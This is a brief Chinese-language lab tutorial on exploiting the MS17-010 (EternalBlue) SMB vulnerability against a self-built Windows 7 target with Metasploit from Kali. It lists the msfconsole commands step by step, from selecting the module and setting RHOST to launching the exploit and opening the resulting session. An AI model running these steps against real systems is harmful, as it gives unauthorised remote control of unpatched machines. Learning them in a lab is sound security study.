实验环境:一台win7靶机,kali作为攻击机
控制台下输入msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
接下来可以看一下受这个漏洞影响的操作系统
可以看出受影响的有两个,分别是win7和server 2008 R2两种操作系统(ps:这两款靶机都可以自己搭建一下,我这里使用的是win7)
show options 看一下需要设置的参数
可以看出我们需要设置RHOST 和RPORT 已经下面两个required为 yes的参数
这里只需设定一下靶机的IP地址即可,其余的参数默认就好
exploit 进行攻击(-z是为了在成功攻击目标后暂时不使用控制会话进行交互),也可以直接exploit,直接返回靶机的控制台,简单的按CTRL -Z命令将控制会话直接放到后台运行,我这里是为了更好地看一下sessions
sessions -l 查看所有的会话
sessions -i ID 启用ID会话
接下来就直接进入到win7的控制台
然后就可以进行下一步的各种操作了
